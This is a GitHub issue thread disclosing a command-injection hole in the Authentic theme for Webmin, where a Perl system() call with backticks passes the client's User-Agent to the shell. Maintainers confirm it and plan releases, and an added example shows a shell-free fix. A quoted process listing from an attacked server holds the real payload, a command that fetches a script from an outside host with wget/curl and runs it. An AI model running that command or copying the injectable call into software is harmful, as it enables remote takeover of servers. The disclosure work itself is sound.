Theme: Enabled Security Alerts poses an issue #467

Closed
pbkwee opened this issue May 25, 2016 · 14 comments
pbkwee commented May 25, 2016

https://github.com/qooob/authentic-theme/blob/ab1b72c0b3c154ba6ea72ec153b6eab59f14c76c/authentic-lib.pm

Line 48

```perl
{
    $subject .= ' (' . get_system_hostname() . ')';
    # $message now ends with the raw User-Agent header sent by the client
    $message .= "\n\n" . get_html_framed_title() . "\n" . get_env('http_user_agent');
    # backticks hand the interpolated string to /bin/sh
    system(`echo "$message" | mail -s "$subject" "$mail[2]"`);
}
```

That system call is an obviously exploitable issue, e.g. on login use a username with a backtick in it to execute arbitrary code on the server.

Suggestion: better escaping, or don't use system calls with backticks.

iliajie (Collaborator) commented May 25, 2016

How are you going to exploit that when the content is not accessible to the user?

iliajie (Collaborator) commented May 25, 2016

Anyway, what is your call? How would you do it? :)

pbkwee (Author) commented May 25, 2016

E.g. the message contains the username on a failed login. The username is crafted to include backticks that escape out of that system call to execute code inside the username.

My call would be for you to remove the backticks in that system call. Notify all your users that they are exploitable and to upgrade to a fixed version. Then I'd look at better ways of cleaning the input to any 'evaled' code.

iliajie (Collaborator) commented May 25, 2016

Alright. I will take a look.

Meanwhile, $remote_user is taken from WebminCore global vars? How could you substitute it??

pbkwee (Author) commented May 25, 2016

E.g. here is a slightly sanitized process listing from an actual server:

```text
root 15905 0.0 2.1 156988 86588 ? S May23 0:00 _ /usr/share/webmin/authentic-theme/session_login.cgi
root 15915 0.0 0.0 4336 760 ? S May23 0:00 | _ sh -c echo "Webmin login page is accessed by unauthenticated user from 199.xxx.xxx.200 Webmin 1.795 on xxx.org (Debian Linux 8) (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || bash -c "wget http://xxx.org/mg -O /tmp/mg;curl -o /tmp/mg http://xxx.org/mg;sh /tmp/mg;rm -rf /tmp/mg"" | mail -s "Webmin login page access alert (xxx.org)" "root"
```

pbkwee (Author) commented May 25, 2016

Oh, looks like the message is the http_user_agent, which of course you can customize. So it's the provided user agent string, not the username. Avoid evals; if you have to use them, then carefully sanitize their inputs.

andreychek commented
Any system call with certain characters in it could be exploited. The key would be to sanitize the input before sending it to a shell call.

One way to fix it would be to use another mechanism for sending email, perhaps talking to port 25 directly. That would avoid the shell altogether, as the shell does have risks. Webmin has built in methods for sending email too I believe, though I haven't experimented with those before.
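As an added illustration of the shell-free approach described in this thread (this is example code written for this page, not authentic-theme's code or its eventual fix): the list form of Perl's `open()` execs `mail` directly with discrete arguments, so nothing in the subject or body is ever parsed by `/bin/sh`. The values for the hostname, recipient and User-Agent are constructed stand-ins for `get_system_hostname()`, `$mail[2]` and `get_env('http_user_agent')`; the helper names `build_mail_argv` and `send_alert` are this example's own.

```perl
#!/usr/bin/perl
# Added example for this issue thread, not authentic-theme code: send the
# login alert without handing attacker-controlled text to /bin/sh.
use strict;
use warnings;

# build_mail_argv returns the exact argv that will be exec'd. Because it is a
# list rather than one command string, a User-Agent containing backticks,
# $(...) or ';' can only ever be message text, never a second command.
sub build_mail_argv {
    my ($to, $subject) = @_;
    # Subject is one argv element; CR/LF are stripped so the value cannot
    # smuggle extra header lines into the generated mail.
    $subject =~ s/[\r\n]+/ /g;
    return ('mail', '-s', $subject, $to);
}

# send_alert pipes the body to mail(1) using the list form of open(), which
# execs the program directly instead of running "sh -c '...'".
sub send_alert {
    my ($to, $subject, $body) = @_;
    my @argv = build_mail_argv($to, $subject);
    open(my $mail, '|-', @argv) or die "cannot exec $argv[0]: $!";
    print {$mail} $body;
    # close() on a pipe waits for the child; $? carries its exit status.
    close($mail) or die "$argv[0] exited with status " . ($? >> 8);
    return 1;
}

# Constructed sample values (hypothetical) standing in for
# get_system_hostname(), $mail[2] and get_env('http_user_agent').
# The user agent carries the kind of text that the original concatenated
# command string would have executed; here it is inert body text.
my $hostname   = 'example.org';
my $to         = 'root';
my $user_agent = 'Mozilla/5.0 `echo would-have-run` $(echo also-this)';

my $subject = "Webmin login page access alert ($hostname)";
my $message = "Webmin login page is accessed by unauthenticated user\n\n"
            . "User-Agent: $user_agent\n";

# Print the argv so the reader can see subject and recipient arrive as
# discrete arguments; only actually send when invoked with --send.
print join(' | ', build_mail_argv($to, $subject)), "\n";
send_alert($to, $subject, $message) if @ARGV && $ARGV[0] eq '--send';
```

Run it without arguments to inspect the argv, or with `--send` on a host that has `mail(1)` to deliver the alert. The same property holds for the port-25 route andreychek mentions: a library such as Net::SMTP writes the message as data on a socket, so there is again no shell in the path; the remaining thing to control in either approach is header injection, which is why the subject has its line breaks removed.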

iliajie (Collaborator) commented May 25, 2016

... are you saying that $remote_user will become anything that gets into the login field??

andreychek commented

I haven't set up a working exploit yet, but it does look very concerning.

We'd need to test this to see what those values really are, but the concern is that $remote_user might be exactly what they type into the Username field, and the contents of "get_env('http_user_agent');" are anything they've set their browser USER_AGENT to be.

Both of those can be easily spoofed using a tool like wget or curl.

iliajie (Collaborator) commented May 25, 2016

$remote_user === $ENV{'REMOTE_USER'}, which is assigned ONLY after successful login!!

Which makes exploit NON-POSSIBLE!!

Prove otherwise!

swelljoe commented
He's saying user-agent is able to be set by the end user, and it is included in that system() call. Exploiting it is trivial (but I won't post it here).

Thanks for the heads up on this, @pbkwee !

I've pinged Jamie. We'll need a new version of the theme that fixes this. And a new Webmin to resolve it for everyone. That'll happen, ASAP. We'll disable theme notifications for now, as we really need to audit that whole thing.

How would you like to be credited on our security page, @pbkwee ?

I wonder if there's some way we can make this issue private, or remove the specific details until we've had a chance to roll a new Webmin release and get it into the repos? This is one that needs a fix before making it public.

In the future, you can email me and Jamie directly about issues like this; even though Authentic is Ilia's project, because it ships as part of Webmin, most security fixes have to go through us anyway, so they get out to everyone as fast as possible. Jamie's email is jcameron@webmin.com and mine is joe@virtualmin.com. You can also open private tickets on virtualmin.com.

iliajie (Collaborator) commented May 25, 2016

Ok, got it.. Sounds very possible that get_env('http_user_agent') might be the bad part as it's coming directly from the user. I will just comment it out and will see how to sanitize that part of the code.

Thanks for writing!!

iliajie closed this as completed May 25, 2016
iliajie changed the title from "exploit issue in system call" to "Notifications problem on the page login" May 25, 2016

pbkwee (Author) commented May 25, 2016

@swelljoe no credit needed. Will email you in future (it's peter at rimuhosting btw).

swelljoe commented
Ah, cool. Thanks, Peter.

So to wrap this one up:

  • Jamie's on a plane, but has rented some satellite Internet to roll a new 1.800 release. Will be out in a few minutes.
  • Ilia's gonna roll a 17.85 theme update today with this specific fix, and then try to get 18.00 of Authentic out tomorrow.
  • We're gonna spend some time auditing Authentic again (this was a new feature, it happened after Jamie last audited the theme).
  • Notifications are gonna be moved out of theme as they belong in core.

iliajie changed the title from "Notifications problem on the page login" to "Theme: Enabled Security Alerts poses an issue" May 26, 2016
iliajie added the bug label and removed the question label May 26, 2016